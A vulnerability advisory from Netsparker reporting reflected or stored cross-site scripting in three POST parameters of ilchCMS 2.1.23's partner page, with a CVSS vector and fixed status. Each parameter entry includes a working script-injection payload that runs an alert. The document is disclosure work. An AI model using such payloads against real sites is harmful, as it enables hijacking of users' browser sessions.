Information  
--------------------  
  
Advisory by Netsparker  
Name: Multiple Cross-site Scripting Vulnerabilities in ilchCMS 2.1.23  
Affected Software: ilchCMS  
Affected Versions: 2.1.23  
Vendor Homepage: https://www.ilch.de/  
Vulnerability Type: Cross-site Scripting  
Severity: Medium  
Status: Fixed  
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N  
Netsparker Advisory Reference: NS-19-016  
  
Technical Details  
--------------------  
  
URL: http://{DOMAIN}/{PATH-OF-ILCHCMS}/index.php/partner/index  
Parameter Name: Link  
Parameter Type: POST  
Attack Pattern: '"@--></style></scRipt><scRipt>alert(0x00BFFE)</scRipt>  
  
URL: http://{DOMAIN}/{PATH-OF-ILCHCMS}/index.php/partner/index  
Parameter Name: Name  
Parameter Type: POST  
Attack Pattern: '"@--></style></scRipt><scRipt>alert(0x00BFFE)</scRipt>  
  
URL: http://{DOMAIN}/{PATH-OF-ILCHCMS}/index.php/partner/index  
Parameter Name: Banner  
Parameter Type: POST  
Attack Pattern: '"@--></style></scRipt><scRipt>alert(0x00BFFE)</scRipt>  
  
Note  
  
- Auth: No  
- Token: Yes  
  
  
For more information:  
https://www.netsparker.com/web-applications-advisories/ns-19-016-cross-site-scripting-in-ilchcms/